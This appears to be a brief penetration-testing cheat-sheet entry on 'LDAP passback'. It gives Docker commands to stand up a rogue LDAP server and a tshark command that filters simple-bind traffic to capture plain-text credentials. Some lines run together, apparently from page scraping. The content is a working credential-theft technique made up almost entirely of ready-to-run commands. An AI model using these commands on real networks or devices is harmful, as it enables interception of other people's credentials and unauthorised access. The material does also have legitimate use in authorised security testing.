LDAP Passback
1) Setup rogue LDAP server
docker buildx build -t ldap-passback .
docker run --rm -ti -p 389:389 ldap-passback2) Listen with tshark to capture plain-text credentials
tshark -i any -f "port 389" -Y "ldap.protocolOp == 0 && ldap.simple" -e ldap.name -e ldap.simple -TjsonLast updated